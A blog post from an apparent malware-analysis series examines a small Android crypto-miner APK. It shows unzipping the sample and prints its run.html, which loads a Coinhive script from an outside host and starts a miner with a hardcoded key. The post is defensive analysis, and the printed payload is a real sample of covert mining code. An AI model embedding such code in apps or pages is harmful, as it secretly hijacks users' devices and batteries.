Fishing for Malware — Part Two: Android Crypto Miner | Sid's Blog
~ / Posts $ cat 'Fishing for Malware — Part Two: Android Crypto Miner.md'

Fishing for Malware — Part Two: Android Crypto Miner

    3 Min     Posts

⇤ Start from the beginning

Information

Indicators of Compromise

File

See this file on VirusTotal

As the heading and package name imply, this is a crypto miner developed for Android devices. However, that isn’t particularly interesting on its own, and 45.43 KB is small — suspiciously small — so let’s take a look inside the file.

Source

Extraction

$ unzip 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip 
Archive:  0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257.raw.zip
  inflating: META-INF/MANIFEST.MF    
  inflating: META-INF/CERT.SF        
  inflating: META-INF/CERT.RSA       
 extracting: res/drawable-xhdpi-v4/ic_launcher.png  
  inflating: AndroidManifest.xml     
 extracting: res/drawable-hdpi-v4/ic_launcher.png  
  inflating: res/layout/activity_main.xml  
  inflating: assets/run.html         
 extracting: resources.arsc          
 extracting: res/drawable-mdpi-v4/ic_launcher.png  
  inflating: classes.dex             
 extracting: res/drawable-xxhdpi-v4/ic_launcher.png  
  inflating: res/menu/main.xml     
  
$

I see an HTML file, some PNG images, and some other files, the extensions of which I am not familiar with. Let’s check them out.

$ cat assets/run.html
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE',{
        threads:4,
        throttle: 0.8
});
    miner.start();
</script>

Sigh. It remains boring. However, by searching for the crypto wallet hardcoded into the HTML, I came across a presentation from Fortinet, indicating that this CoinHive-related malware may have been a part of the Trinity Android P2P malware bot, which is quite interesting. Alas, that is a rabbit hole for another blog post.

Each PNG was a rescaled version of the stock Android logo — not much to say beyond that.

How I assume this malware works:

  1. The victim’s stock web browser embeds into an app frame in the background.

  2. Instructions are received from CoinHive.

  3. The miner starts working, sending proof of work to the address hardcoded into the script.

  4. The victim’s phone gets too hot, or the battery drains too fast; upon seeing the culprit as com.ufo.miner in the power report of the device, the victim promptly uninstalls the application.

Personal Thoughts

This is a very small application and doesn’t perform any particularly special operations; in fact, I debated including it in this series at all. More interesting that the malware itself to me, however, is the platform it targets.

In the context of cryptocurrency mining, Android devices are not particularly powerful, and therefore not as lucrative as most other computing machines. It would take a vast, vast array of Android smartphones/tablets/et cetera to generate even a moderate amount of the more popular cryptocurrencies available today, such as Bitcoin. This issue is exacerbated by the ease of detection; many users infected with this malware, I would reason, could trivially identify its existance via the power usage utility on their respective Android device, thereby shortening runtime.

A humorus reference to Coinhive’s coinhive.min.js script I found online: “Stack Overflow: [Coinhive header] automatically appears in my website”

And, finally, kudos to Troy Hunt, who bought the Coinhive domain and shut it down.

Thanks so much for reading!

Fishing for Malware: Part 3 →
← Fishing for Malware: Part 1


Share 'Fishing for Malware — Part Two: Android Crypto Miner'

Thank you so much for reading this entry. Note that I am open to questions, comments, and criticism — I learn alongside you. Do you see something that's not quite right or that I could otherwise improve upon? Please, do not hesitate to suggest an edit.

Email Twitter LinkedIn GitHub